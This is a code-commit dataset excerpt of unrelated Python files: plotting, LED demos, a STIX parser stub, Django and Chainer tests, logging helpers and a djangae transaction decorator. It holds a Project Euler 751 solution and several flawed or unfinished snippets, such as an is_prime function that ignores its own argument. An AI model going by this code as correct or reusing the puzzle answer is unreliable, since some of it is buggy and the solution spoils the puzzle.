ind = metaseq.plotutils.tip_zscores(normalized)
fig = metaseq.plotutils.imshow(
    normalized,
    vmin=5,
    vmax=99.,
    percentile=True,
    sort_by=ind,
    imshow_kwargs=dict(interpolation='bilinear'),
    line_kwargs=dict(color='k'),
    fill_kwargs=dict(color='k', alpha=0.4),
    x=np.linspace(-1000, 1000, 100),
    height_ratios=(2, 1, 1)
)
fig.array_axes.xaxis.set_visible(False)
fig.array_axes.set_ylabel('Transcripts on chr17')
fig.array_axes.axvline(0, color='k', linestyle='--')
fig.line_axes.set_xlabel('Distance from TSS')
fig.line_axes.axvline(0, color='k', linestyle='--')
from matplotlib import pyplot as plt
import matplotlib
# Expression table joined to the TSS features by transcript id.
d = metaseq.results_table.ResultsTable(
    metaseq.example_filename('GSM847566_SL2592.table'),
    import_kwargs=dict(index_col=0))
d = d.reindex_to(features, attribute='transcript_id')
import pandas
# FPKM quartiles; one averaged enrichment trace per quartile below the
# heatmap.  (Python 2 script: note the print statement in the loop.)
labels = pandas.qcut(d.fpkm, 4).labels
ulabels = sorted(list(set(labels)))
colors = matplotlib.cm.YlOrBr((np.array(ulabels) + 2) / 5.)
bottom_axes = plt.subplot(fig.gs[2, 0])
for q, color in zip(ulabels, colors):
    ind = labels == q
    print q, color
    metaseq.plotutils.ci_plot(
        np.linspace(-1000, 1000, 100),
        normalized[ind, :],
        ax=bottom_axes,
        line_kwargs=dict(color=color, label=q),
        fill_kwargs=dict(color=color, alpha=0.5),
    )
fig.line_axes.xaxis.set_visible(False)
bottom_axes.set_xlabel('Distance from TSS')
bottom_axes.legend(loc='best', fontsize=10)
fig.array_axes.set_ylabel('Transcripts')
fig.cax.set_ylabel('Enrichment')
fig.subplots_adjust(left=0.2)
bottom_axes.set_ylabel('Enrichment')
fig.line_axes.set_ylabel('Enrichment')
plt.show()
plt.show()
| Python | 0.000002 | |
c1fc0121b02656de7bc99c587743485b5e45e416 | Create angelbambi.py | angelbambi.py | angelbambi.py | #the following lines will allow you to use buttons and leds
import btnlib as btn
import ledlib as led
import time
#the led.startup() function cycles through the leds
led.startup()
time.sleep(1)
print("All on and off")
#to turn on all leds, use the led.turn_on_all() function:
led.turn_on_all()
time.sleep(2)
#to turn off all:
led.turn_off_all()
time.sleep(1)
print("Red on and off")
#to turn on a single led, use a command like this:
led.turn_on(led.red)
#your choices for leds are led.red, led.yellow, led.green, led.blue
time.sleep(2)
#to turn it off:
led.turn_off(led.red)
time.sleep(1)
print("Yellow with isOn test")
#the led.isOn(led) function tells you if a particular led is currently on
if led.isOn(led.yellow):
    print("Yellow is on")
else :
    #BUGFIX: the original printed "Yellow is on" in both branches, so this
    #first demo could never show the LED as off (the second demo below had
    #it right).
    print("Yellow is off")
time.sleep(3)
led.turn_on(led.yellow)
if led.isOn(led.yellow):
    print("Yellow is on")
else :
    print("Yellow is off")
time.sleep(6)
led.turn_off(led.yellow)
#NOTE(review): a 41-second pause looks like a typo for 1 -- confirm before
#changing, so the original timing is preserved here.
time.sleep(41)
print("Green and blue switch")
#the led.switch(led) function knows whether an led is on or off and switches its value
led.turn_on(led.green)
time.sleep(3)
led.switch(led.green)
led.switch(led.blue)
time.sleep(2.2)
led.switch(led.blue)
time.sleep(1.4)
print("If switch is on, press yellow for yellow and red for red")
#the btn.isOn(btn) function tells you if a particular button is being pressed or if a switch is on
#your choices for buttons are currently btn.red, btn.yellow, btn.switch
while btn.isOn(btn.switch) :
    if btn.isOn(btn.yellow):
        led.switch(led.purple)
    if btn.isOn(btn.red) :
        led.switch(led.blue)
    time.sleep(0.25) #this line keeps it from querying too fast and mistaking a long press for multiple presses
print("Goodbye")
btn.GPIO.cleanup()
| Python | 0.002066 | |
d3f46aba674f6fb402702ad803938c3401bfd0dd | Refactor of stix2misp - only a beginning atm | app/files/scripts/stix_to_misp.py | app/files/scripts/stix_to_misp.py | # -*- coding: utf-8 -*-
# Copyright (C) 2017-2018 CIRCL Computer Incident Response Center Luxembourg (smile gie)
# Copyright (C) 2017-2018 Christian Studer
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, json, os, time
import pymisp
from stix.core import STIXPackage
descFilename = os.path.join(pymisp.__path__[0], 'data/describeTypes.json')
with open(descFilename, 'r') as f:
categories = json.loads(f.read())['result'].get('categories')
class StixParser():
    """Parse a STIX 1.x export (MISP-generated or external) into a MISPEvent."""
    def __init__(self):
        # Target event populated by the build* methods below.
        self.misp_event = pymisp.MISPEvent()
    def loadEvent(self, args, pathname):
        """Load ``<pathname>/tmp/<args[1]>`` as JSON, falling back to STIX XML.

        Sets ``self.event`` and ``self.isJson``; ``self.fromMISP`` is only set
        on the XML path.  NOTE(review): the JSON branch never assigns
        ``self.fromMISP``, so handler() would raise AttributeError for JSON
        input -- confirm the intended flag value for that path.
        """
        try:
            filename = '{}/tmp/{}'.format(pathname, args[1])
            try:
                with open(filename, 'r') as f:
                    self.event = json.loads(f.read())
                self.isJson = True
            except:
                # Not JSON: parse the file as a STIX XML package instead.
                event = STIXPackage.from_xml(filename)
                if args[1].startswith('misp.'):
                    fromMISP = True
                else:
                    fromMISP = False
                self.isJson = False
                if fromMISP:
                    # MISP nests the incident inside a related package.
                    self.event = event.related_packages.related_package[0].item.incidents[0]
                else:
                    self.event = event
                self.fromMISP = fromMISP
        except:
            print(json.dumps({'success': 0, 'message': 'The temporary STIX export file could not be read'}))
            sys.exit(0)
    def handler(self, args):
        """Pick the output name and dispatch to the MISP/external builder."""
        if self.isJson:
            self.namefile = args[1]
        else:
            self.namefile = '{}.json'.format(args[1])
        if self.fromMISP:
            self.buildMispDict()
        else:
            self.buildExternalDict()
    def buildMispDict(self):
        """Populate the MISP event from a MISP-originated STIX incident."""
        self.dictTimestampAndDate()
        self.eventInfo()
        for indicator in self.event.related_indicators.indicator:
            self.parse_misp_indicator(indicator)
    def buildExternalDict(self):
        """Populate the MISP event from an external STIX package (partial)."""
        self.dictTimestampAndDate()
        self.eventInfo()
    def dictTimestampAndDate(self):
        """Derive the event date and epoch timestamp from the STIX timestamp."""
        stixTimestamp = self.event.timestamp
        try:
            # String timestamp: the date is everything before the 'T'.
            date = stixTimestamp.split("T")[0]
        except AttributeError:
            # datetime-like object: use it as-is.
            date = stixTimestamp
        self.misp_event.date = date
        self.misp_event.timestamp = self.getTimestampfromDate(stixTimestamp)
    def getTimestampfromDate(self, date):
        """Convert a STIX timestamp (string or datetime) to epoch seconds."""
        try:
            try:
                # e.g. '2018-01-01T12:00:00+00:00' -> drop the UTC offset.
                dt = date.split('+')[0]
                d = int(time.mktime(time.strptime(dt, "%Y-%m-%dT%H:%M:%S")))
            except:
                # e.g. fractional seconds present -> drop them instead.
                dt = date.split('.')[0]
                d = int(time.mktime(time.strptime(dt, "%Y-%m-%dT%H:%M:%S")))
        except AttributeError:
            # Not a string: assume a datetime-like object.
            d = int(time.mktime(date.timetuple()))
        return d
    def eventInfo(self):
        """Set the MISP event info from the STIX title, with a fallback note."""
        try:
            try:
                info = self.event.stix_header.title
            except:
                info = self.event.title
            if info:
                self.misp_event.info = info
            else:
                # Empty title: raise to reach the shared fallback below.
                raise Exception("Imported from external STIX event")
        except Exception as noinfo:
            # NOTE(review): this assigns the Exception *object* rather than
            # its message -- probably str(noinfo) was intended.
            self.misp_event.info = noinfo
    def parse_misp_indicator(self, indicator):
        """Route an indicator to attribute or object parsing by relationship."""
        # ``categories`` is the MISP category list loaded at module import.
        if indicator.relationship in categories:
            self.parse_misp_attribute(indicator)
        else:
            self.parse_misp_object(indicator)
    def parse_misp_attribute(self, indicator):
        """Start of attribute parsing (incomplete: result is not stored yet)."""
        misp_attribute = pymisp.MISPAttribute()
        misp_attribute.category = indicator.relationship
        properties = indicator.item.observable
    def parse_misp_object(self, indicator):
        """Start of object parsing (incomplete: result is not stored yet)."""
        name = str(indicator.relationship)
        if name in ['file']:
            misp_object = pymisp.MISPObject(name)
def main(args):
    """CLI entry point: ``args[1]`` names a STIX export under <script dir>/tmp/."""
    script_dir = os.path.dirname(args[0])
    parser = StixParser()
    parser.loadEvent(args, script_dir)
    parser.handler(args)
    print(parser.misp_event)
if __name__ == "__main__":
    main(sys.argv)
| Python | 0 | |
0135ce760bb3bf8f2fd828fdb195bcdc4e4c3117 | Add sample.py | sample.py | sample.py | from traitscli import TraitsCLIBase
from traits.api import Bool, Float, Int, Str, Enum, Event
class SampleCLI(TraitsCLIBase):
    """Sample CLI using `traitscli`."""
    # Traits declared without ``config=True`` are not exposed on the
    # command line; the rest become options of matching type.
    not_configurable_from_cli = Bool
    yes = Bool(config=True)
    fnum = Float(config=True)
    inum = Int(config=True)
    string = Str(config=True)
    choice = Enum(['a', 'b', 'c'], config=True)
    def do_run(self):
        # Print every trait name/value pair, aligned on the longest name.
        # (Python 2 print statement below: this script targets Python 2.)
        names = self.class_trait_names(
            # Avoid 'trait_added' and 'trait_modified'
            # (See also `HasTraits.traits`):
            trait_type=lambda t: not isinstance(t, Event))
        width = max(map(len, names))
        for na in names:
            print "{0:{1}} : {2!r}".format(na, width, getattr(self, na))
# Delegate argument parsing and dispatch to TraitsCLIBase.cli().
if __name__ == '__main__':
    SampleCLI.cli()
| Python | 0.000001 | |
1706531082d75f7d6522b4f7d409df8d4fb2b3d7 | Create __init__.py | plantcv/plantcv/visualize/eCDF/__init__.py | plantcv/plantcv/visualize/eCDF/__init__.py | from plantcv.plantcv.visualize.eCDF.obj_size import obj_size
# Public API of the eCDF visualization subpackage.
__all__ = ["obj_size"]
| Python | 0.000429 | |
4d4120d6982a02a01b8dd2a4853eab47d7fe6f83 | Create tests.py | polls/tests.py | polls/tests.py | import datetime
from django.utils import timezone
from django.test import TestCase
from .models import Question
# Create your tests here.
class QuestionMethodTests(TestCase):
    """Unit tests for Question.was_published_recently()."""

    def test_was_published_recently_with_future_question(self):
        """
        was_published_recently() should return False for questions whose
        pub_date is in the future.
        """
        future_date = timezone.now() + datetime.timedelta(days=30)
        question = Question(pub_date=future_date)
        self.assertEqual(question.was_published_recently(), False)

    def test_was_published_recently_with_old_question(self):
        """
        was_published_recently() should return False for question whose
        pub_date is older than 1 day.
        """
        old_date = timezone.now() - datetime.timedelta(days=30)
        question = Question(pub_date=old_date)
        self.assertEqual(question.was_published_recently(), False)

    def test_was_published_recently_with_recent_question(self):
        """
        was_published_recently() should return True for question whose
        pub_date is within the last day.
        """
        recent_date = timezone.now() - datetime.timedelta(hours=1)
        question = Question(pub_date=recent_date)
        self.assertEqual(question.was_published_recently(), True)
| Python | 0.000001 | |
84e52f3aa2679c0dd709a2cb794b3426541060d4 | add cftt/feature/feature.py new file: cftt/feature/feature.py | cftt/feature/feature.py | cftt/feature/feature.py | # -*- coding: utf-8 -*-
import sys
import os
import json
import collections
from shapely.geometry.point import BaseGeometry
from shapely.geometry import shape, mapping
from shapely.ops import cascaded_union
import util
class Feature(object):
    """Class for handling a single GeoJSON-style feature.

    (Python 2 codebase: note the use of ``unicode`` and the old
    ``collections.Set`` ABC throughout.)
    """
    def __init__(self, data):
        """Construct a feature.
        :param data: Feature, or a Mapping with 'geometry' and 'properties'
        """
        self.load(data)
    def load(self, data):
        """(Re)build this feature from *data*.
        :param data: Feature, or a Mapping with 'geometry' and 'properties';
            every other key is kept as an extra attribute ('type' is dropped)
        """
        if isinstance(data, Feature):
            self.geometry = data.geometry
            self.properties = data.properties
            self.attributes = data.attributes
        else:
            self.geometry = data['geometry']
            self.properties = data['properties']
            self.attributes = {
                k: v for k, v in data.items()
                if k not in set(('geometry', 'properties', 'type'))
            }
        return self
    def dump(self):
        """Return a plain object representing this instance, suitable for
        json.dumps and friends.
        """
        return dict({u'type': u'Feature',
                     u'geometry': util.rec_decode(mapping(self._geometry)),
                     u'properties': self._properties}, **self._attributes)
    @property
    def properties(self):
        """Return this instance's properties mapping itself (not a copy)."""
        return self._properties
    @properties.setter
    def properties(self, x):
        """Set this instance's properties.
        :param x: Mapping object
        """
        if not util.is_map(x):
            raise Exception('properties must be an instance of Mapping')
        self._properties = util.rec_decode(x)
        return self
    @property
    def geometry(self):
        """Return this instance's geometry object itself."""
        return self._geometry
    @geometry.setter
    def geometry(self, x):
        """Set this instance's geometry.
        :param x: shapely geometry, or a Mapping convertible via shape()
        """
        if isinstance(x, BaseGeometry):
            self._geometry = x
        elif util.is_map(x):
            self._geometry = shape(x)
        else:
            raise Exception('geometry must be an instance of shape')
        return self
    @property
    def attributes(self):
        """Return the mapping of this instance's extra attributes."""
        return self._attributes
    @attributes.setter
    def attributes(self, x):
        """Set this instance's extra attributes.
        :param x: Mapping object
        """
        if not util.is_map(x):
            raise Exception('attributes must be an instance of Mapping')
        self._attributes = util.rec_decode(x)
        return self
    def property(self, *x):
        """Get/set entries of ``properties``.
        property('id') returns the value of the 'id' property.
        property('id', 'a123') sets the 'id' property to 'a123'.
        :param x: a single key, a list/dict/set/tuple of keys, or a
            key-value pair; setting a value of None deletes the key
        """
        if len(x) == 0:
            return self
        if len(x) == 1:
            if util.is_map(x[0]):
                # Mapping: set every key-value pair it contains.
                for k, v in util.rec_decode(x[0]).items():
                    self.property(k, v)
                return self
            if isinstance(x[0], collections.Set):
                # Set of keys: return a dict of their values.
                return {k: self.property(k) for k in util.rec_decode(x[0])}
            if util.is_array(x[0]):
                # Sequence of keys: return values in a container of the
                # same kind as the argument.
                return util.cons_array(
                    (self.property(k) for k in util.rec_decode(x[0])),
                    x[0].__class__, tuple)
            k = util.safe_decode(x[0])
            if not util.is_string(x[0]):
                k = unicode(x[0])
            if k in self._properties:
                return self._properties[k]
            return None
        # Two arguments: set (or, for a None value, delete) one property.
        k = util.safe_decode(x[0])
        if not util.is_string(x[0]):
            k = unicode(x[0])
        v = util.rec_decode(x[1])
        if v is None:
            if k in self._properties:
                del self._properties[k]
            return self
        self._properties[k] = v
        return self
    def attr(self, *x):
        """Get/set entries of ``attributes`` (mirror of :meth:`property`).
        attr('id') returns the value of the 'id' attribute.
        attr('id', 'a123') sets the 'id' attribute to 'a123'.
        :param x: a single key, a list/dict/set/tuple of keys, or a
            key-value pair; setting a value of None deletes the key
        """
        if len(x) == 0:
            return self
        if len(x) == 1:
            if util.is_map(x[0]):
                for k, v in util.rec_decode(x[0]).items():
                    self.attr(k, v)
                return self
            if isinstance(x[0], collections.Set):
                return {k: self.attr(k) for k in util.rec_decode(x[0])}
            if util.is_array(x[0]):
                return util.cons_array(
                    (self.attr(k) for k in util.rec_decode(x[0])),
                    x[0].__class__, tuple)
            k = util.safe_decode(x[0])
            if not util.is_string(x[0]):
                k = unicode(x[0])
            if k in self._attributes:
                return self._attributes[k]
            return None
        k = util.safe_decode(x[0])
        if not util.is_string(x[0]):
            k = unicode(x[0])
        v = util.rec_decode(x[1])
        if v is None:
            if k in self._attributes:
                del self._attributes[k]
            return self
        self._attributes[k] = v
        return self
| Python | 0.000001 | |
15aa7efa3dfdade3001cdb6b5ac4c2f3c5cc2461 | Test Commit | raspberry/asip/RelationSemanticTag.py | raspberry/asip/RelationSemanticTag.py | from SemanticTag import *
#Test | Python | 0.000001 | |
95c34b9ad7ca6c425853642353a2d56282cc94d1 | add script | plugins/Scripts/Plugins/Convert_To_8bit.py | plugins/Scripts/Plugins/Convert_To_8bit.py | # @DatasetIOService ds
# @ConvertService convert
# @UIService ui
import os
from ij import IJ
from ij import ImagePlus
d = "/home/hadim/Insync/Data/Microscopy/PSF/2016.04.12.T1/raw"
files = os.listdir(d)
for fname in files:
fpath = os.path.join(d, fname)
print(fpath)
print(fpath)
dataset = ds.open(fpath)
ui.show(dataset)
imp = convert.convert(dataset, ImagePlus)
IJ.run("8-bit")
ds.save(dataset, fpath) # DOES NOT WORK
| Python | 0.000001 | |
0b058198539195b5520687c744b5cd1eebae3d18 | predict all files in dir | predict_dir.py | predict_dir.py | import argparse
import os
from predict import main
def run_dir(in_path, out_path):
for item in os.listdir(in_path):
if item.endswith('.wav'):
out_file_path = out_path + item.replace('.wav', '.TextGrid')
main(in_path + item, out_file_path)
if __name__ == "__main__":
# the first argument is the wav file path
# the second argument is the TextGrid path
# -------------MENU-------------- #
# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("in_dir", help="The input directory")
parser.add_argument("out_dir", help="The output directory")
args = parser.parse_args()
# main function
run_dir(args.in_dir, args.out_dir)
| Python | 0.998316 | |
8cdbda5c0694f4137c1b8a92bafd7f33a6a84d78 | solve pep_751 | pe-solution/src/main/python/pep_751.py | pe-solution/src/main/python/pep_751.py | from typing import Tuple
from decimal import Decimal, ROUND_FLOOR
def b_a(b: Decimal) -> Tuple[Decimal, Decimal]:
a = b.to_integral_exact(ROUND_FLOOR)
b = a * (b % 1 + 1)
return a, b
def th_tau(th: Decimal, n: int) -> Decimal:
a1, b = b_a(th)
l = []
for _ in range(2, n + 1):
a, b = b_a(b)
l.append(a)
return Decimal(f"{a1}." + "".join(map(str, l)))
def solve():
n_max = 15
tau = 2
for n in range(2, n_max + 1):
k = Decimal(10) ** (-n + 1)
for th in [tau + k * x for x in range(0, 10)]:
if (tau := th_tau(th, n)) < th:
break
return f"{tau:.24f}"
if __name__ == "__main__":
theta = Decimal("2.956938891377988")
tau = Decimal("2.3581321345589")
assert th_tau(theta, 9) == tau
print(solve())
| Python | 0.999969 | |
0428d4889b34568a5b5397532dfd0091029b64de | Create problem-10.py | problem-10.py | problem-10.py | import math
def is_prime(next):
if n == 2:
return True
if n == 3:
return True
if n % 2 == 0:
return False
if n % 3 == 0:
return False
i = 5
w = 2
while math.pow(i, 2) <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
s = 0
max = 2000000
for n in range(2, max-1):
if is_prime(n):
s += n
print(s)
| Python | 0.00049 | |
4fe4cad49367b462c2201b98cce4382bff3a0206 | Add a script which use the iterative parsing to process the map file and find out not only what tags are there, but also how many, to get the feeling on how much of which data you can expect to have in the map. | DataWrangling/CaseStudy/mapparser.py | DataWrangling/CaseStudy/mapparser.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Your task is to use the iterative parsing to process the map file and
find out not only what tags are there, but also how many, to get the
feeling on how much of which data you can expect to have in the map.
Fill out the count_tags function. It should return a dictionary with the
tag name as the key and number of times this tag can be encountered in
the map as value.
Note that your code will be tested with a different data file than the 'example.osm'
"""
import xml.etree.cElementTree as ET
import pprint
import os
def count_tags(filename):
# YOUR CODE HERE
tags = {}
for event, elem in ET.iterparse(filename):
if elem.tag in tags:
tags[elem.tag] += 1
else:
tags[elem.tag] = 1
return tags
def test():
os.chdir('./data')
tags = count_tags('example.osm')
pprint.pprint(tags)
assert tags == {'bounds': 1,
'member': 3,
'nd': 4,
'node': 20,
'osm': 1,
'relation': 1,
'tag': 7,
'way': 1}
if __name__ == "__main__":
test() | Python | 0 | |
3d18f6e3ba3519422aa30bd25f3511f62361d5ca | Add test to ensure no mutable default arguments | tests/chainer_tests/test_chainer_objects.py | tests/chainer_tests/test_chainer_objects.py | import importlib
import inspect
import pkgutil
import types
import six
import unittest
import chainer
from chainer import testing
def walk_modules():
root = chainer.__path__
for loader, modname, ispkg in pkgutil.walk_packages(root, 'chainer.'):
# Skip modules generated by protobuf.
if '_pb2' in modname:
continue
try:
mod = importlib.import_module(modname)
except ImportError:
continue
yield mod
def get_classes(module):
# Enumerate classes from a module
for name, o in module.__dict__.items():
if (inspect.isclass(o)
and o.__module__.startswith('chainer.')):
yield o
def get_functions(module):
# Enumerate functions from a module
# Normal functions
for k, o in module.__dict__.items():
if (isinstance(o, types.FunctionType)
and o.__module__.startswith('chainer.')):
yield o
# Methods defined in a class
for cls in get_classes(module):
if cls.__module__.startswith('chainer.'):
for k, o in cls.__dict__.items():
if inspect.isfunction(o):
yield o
def get_default_arguments(func):
# Retrieves the defaults arguments (names and values) of a function.
if six.PY2:
# Python 2
spec = inspect.getargspec(func)
if spec.defaults is not None:
n = len(spec.defaults)
for name, default_value in zip(spec.args[-n:], spec.defaults):
yield name, default_value
else:
# Python 3
signature = inspect.signature(func)
for name, param in signature.parameters.items():
if param.default is not inspect.Parameter.empty:
yield name, param.default
class TestFunctions(unittest.TestCase):
    """Scan the whole chainer package for mutable default argument values."""

    def test_no_mutable_default_args(self):
        # list/dict defaults are shared across calls -- the classic Python
        # mutable-default pitfall this test guards against.
        type_blacklist = (list, dict)
        badlist = []
        # Collect mutable default arguments
        for mod in walk_modules():
            for func in get_functions(mod):
                for arg_name, value in get_default_arguments(func):
                    if isinstance(value, type_blacklist):
                        badlist.append((func, arg_name, type(value)))
        if len(badlist) > 0:
            # Report the error with one line per offending argument.
            s = six.StringIO()
            s.write(
                'Some functions have mutable values as default values:\n\n')
            for func, arg_name, value_type in badlist:
                s.write('{}.{}: arg=\'{}\' type={}\n'.format(
                    func.__module__, func.__name__, arg_name, value_type))
            assert False, s.getvalue()
# Register this module's tests with chainer's test runner.
testing.run_module(__name__, __file__)
| Python | 0 | |
fcb07c7cd94f96cd533c55d18a657673f9eeac7f | Move log related functions over to this file | SpicyTwitch/Log_tools.py | SpicyTwitch/Log_tools.py | # Imports-----------------------------------------------------------------------
import logging
import os
from inspect import stack, getmodulename
from . import Storage
# Base setup--------------------------------------------------------------------
# Module-wide logging configuration.  NOTE: console_handler below is a
# single shared instance attached to every logger this module creates.
log_to_stdout = True
log_to_file = True
logging_level = logging.DEBUG # TODO: Change this back to INFO!
log_format = '[%(asctime)s] [%(levelname)s] [%(module)s] (%(funcName)s): ' \
             '%(message)s'
date_format = '%Y/%m/%d %I:%M:%S %p'
log_formatter = logging.Formatter(log_format, datefmt=date_format)
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_formatter)
# Per-module log files live under <primary storage>/logs; create it once
# at import time.
log_storage = os.path.join(Storage.primary_storage_directory, 'logs')
if not os.path.exists(log_storage):
    os.mkdir(log_storage)
# Functions---------------------------------------------------------------------
def get_module_name() -> str:
    # stack()[2] is the frame of whoever called our caller (create_logger),
    # so loggers end up named after the module that invoked create_logger().
    # Fragile by design: inserting another call layer changes the index.
    return getmodulename(stack()[2][1])
def create_logger() -> logging.Logger:
    """Return a logger named after the calling module, wired per the
    module-level configuration (console and/or per-module log file).

    BUGFIX: logging.getLogger returns the *same* logger on repeated calls,
    and the original unconditionally re-attached handlers each time, so a
    module that called this twice logged every record twice.  The
    ``handlers`` guard makes the function idempotent.
    """
    python_module = get_module_name()
    module_logger = logging.getLogger(python_module)

    if not module_logger.handlers:
        if log_to_stdout:
            module_logger.addHandler(console_handler)

        if log_to_file:
            file_path = os.path.join(log_storage, python_module + '.log')
            file_handler = logging.FileHandler(file_path)
            file_handler.setFormatter(log_formatter)
            module_logger.addHandler(file_handler)

    module_logger.setLevel(logging_level)
    return module_logger
| Python | 0 | |
7ec36d0a1d0a757d0c914e4857ae06f4fece88f8 | Add HexTerrain | problem/pop_map/hexagon/hex_terrain.py | problem/pop_map/hexagon/hex_terrain.py | #! /usr/bin/env python
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
"""Implements a "flat" hex grid, using invaluable advice from Amit Patel
https://www.redblobgames.com/grids/hexagons
"""
# We choose flat-top rather than pointy-top hexes,
# with odd-q vertical layout. # , and doubleheight.
# We adopt Amit's "origin at upper left" convention,
# which implies that angles resemble compass angles,
# with small positive angles in quadrant IV rather than I.
from enum import Enum, auto
import numpy as np
class Direction(Enum):
# (col, row) deltas
SE = (1, 0)
SOUTH = (0, 1)
SW = (-1, 0)
NW = (-1, -1)
NORTH = (0, -1)
NE = (1, -1)
class CellContent(Enum):
# breadcrumbs for a traversed path:
MARKED_SE = auto()
MARKED_SOUTH = auto()
MARKED_SW = auto()
MARKED_NW = auto()
MARKED_NORTH = auto()
MARKED_NE = auto()
UNMARKED = auto() # like Path in a maze
CITY = auto() # a goal cell
MOUNTAIN = auto() # impassable, like Wall in a maz
class HexTerrain:
''
if __name__ == '__main__':
HexTerrain()
| Python | 0.000012 | |
4061e5db7097a680405282e371ab3bf07758648a | Add simple unit tests to validate all configs | projects/DensePose/tests/test_setup.py | projects/DensePose/tests/test_setup.py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import os
import unittest
from detectron2.config import get_cfg
from detectron2.engine import default_setup
from densepose import add_densepose_config
_CONFIG_DIR = "configs"
_QUICK_SCHEDULES_CONFIG_SUB_DIR = "quick_schedules"
_CONFIG_FILE_PREFIX = "densepose_"
_CONFIG_FILE_EXT = ".yaml"
def _get_config_dir():
    """Return the absolute path of the DensePose config directory."""
    here = os.path.dirname(os.path.realpath(__file__))
    return os.path.join(here, "..", _CONFIG_DIR)
def _collect_config_files(config_dir):
    """Return paths of files in *config_dir* named densepose_*.yaml."""
    return [
        os.path.join(config_dir, entry)
        for entry in os.listdir(config_dir)
        if os.path.splitext(entry)[1] == _CONFIG_FILE_EXT
        and entry.startswith(_CONFIG_FILE_PREFIX)
    ]
def _get_config_files():
    """Return all top-level DensePose config file paths."""
    return _collect_config_files(_get_config_dir())
def _get_quick_schedules_config_files():
    """Return config file paths from the quick_schedules sub-directory."""
    quick_dir = os.path.join(_get_config_dir(), _QUICK_SCHEDULES_CONFIG_SUB_DIR)
    return _collect_config_files(quick_dir)
class TestSetup(unittest.TestCase):
    """Smoke tests: every DensePose config must load and set up cleanly."""

    def _test_setup(self, config_file):
        # Build the base config, add DensePose options, merge the file,
        # then run detectron2's default_setup to surface config errors.
        cfg = get_cfg()
        add_densepose_config(cfg)
        cfg.merge_from_file(config_file)
        cfg.freeze()
        default_setup(cfg, {})

    def test_setup_configs(self):
        # Top-level configs under configs/.
        config_files = _get_config_files()
        for config_file in config_files:
            self._test_setup(config_file)

    def test_setup_quick_schedules_configs(self):
        # Quick-schedule smoke-test configs under configs/quick_schedules/.
        config_files = _get_quick_schedules_config_files()
        for config_file in config_files:
            self._test_setup(config_file)
| Python | 0.000001 | |
d1bc6c3fd5741c5c8d3d6dd2ee5c5c28c2764ba3 | add Tumblr.py | TumblrResource/Tumblr.py | TumblrResource/Tumblr.py | #!/usr/bin/env python
# coding:utf-8
| Python | 0 | |
2d73440f76faab151745ebf5a7a92aaec21cb491 | Write a more reliable transaction decorator | djangae/db/transaction.py | djangae/db/transaction.py | from google.appengine.api.datastore import (
CreateTransactionOptions,
_GetConnection,
_PushConnection,
_PopConnection,
_SetConnection,
IsInTransaction
)
from google.appengine.datastore.datastore_rpc import TransactionOptions
from djangae.db.backends.appengine import caching
class ContextDecorator(object):
    """Base for objects usable both as a decorator and a context manager.

    Subclasses provide __enter__/__exit__; the wrapped callable runs
    inside that context.
    """
    def __init__(self, func=None):
        self.func = func

    def __call__(self, *args, **kwargs):
        def decorated(*_args, **_kwargs):
            # Run the wrapped function inside this object's context.
            with self:
                return self.func(*_args, **_kwargs)

        if not self.func:
            # Parameterised usage (@decorator(...)): this call receives
            # the function itself; return the wrapper for later calls.
            self.func = args[0]
            return decorated

        # Bare usage (@decorator): the function is already known, so the
        # incoming args are the real call arguments — run immediately.
        return decorated(*args, **kwargs)


class TransactionFailedError(Exception):
    """Raised when committing a datastore transaction does not succeed."""
    pass


class AtomicDecorator(ContextDecorator):
    """Run the wrapped code inside a datastore transaction.

    xg enables cross-group transactions; independent starts a new
    transaction even when one is already active, by temporarily popping
    the current connection onto conn_stack.
    """
    def __init__(self, func=None, xg=False, independent=False):
        self.independent = independent
        self.xg = xg
        self.conn_stack = []
        super(AtomicDecorator, self).__init__(func)

    def _do_enter(self, independent, xg):
        # Clear the context cache at the start of a transaction
        caching.clear_context_cache()

        if IsInTransaction():
            if independent:
                # Park the enclosing transaction's connection, then retry;
                # restore it if starting the inner transaction fails.
                self.conn_stack.append(_PopConnection())
                try:
                    return self._do_enter(independent, xg)
                except:
                    _PushConnection(self.conn_stack.pop())
                    raise
            # NOTE(review): a non-independent call inside a transaction
            # falls through and starts another transaction here —
            # confirm this nesting behaviour is intended.

        options = CreateTransactionOptions(
            xg=xg,
            propagation=TransactionOptions.INDEPENDENT if independent else None
        )

        conn = _GetConnection()
        _PushConnection(None)
        _SetConnection(conn.new_transaction(options))

    def _do_exit(self, independent, xg, exception):
        try:
            if exception:
                _GetConnection().rollback()
            else:
                # commit() returning falsy means the commit did not apply.
                if not _GetConnection().commit():
                    raise TransactionFailedError()
        finally:
            _PopConnection()

            if independent:
                # Restore any parked enclosing connections.
                while self.conn_stack:
                    _PushConnection(self.conn_stack.pop())

            # Clear the context cache at the end of a transaction
            caching.clear_context_cache()

    def __enter__(self):
        self._do_enter(self.independent, self.xg)

    def __exit__(self, exc_type, exc_value, traceback):
        self._do_exit(self.independent, self.xg, exc_type)
atomic = AtomicDecorator
commit_on_success = AtomicDecorator # Alias to the old Django name for this kinda thing
| from google.appengine.api.datastore import (
CreateTransactionOptions,
_GetConnection,
_PushConnection,
_PopConnection,
_SetConnection,
IsInTransaction
)
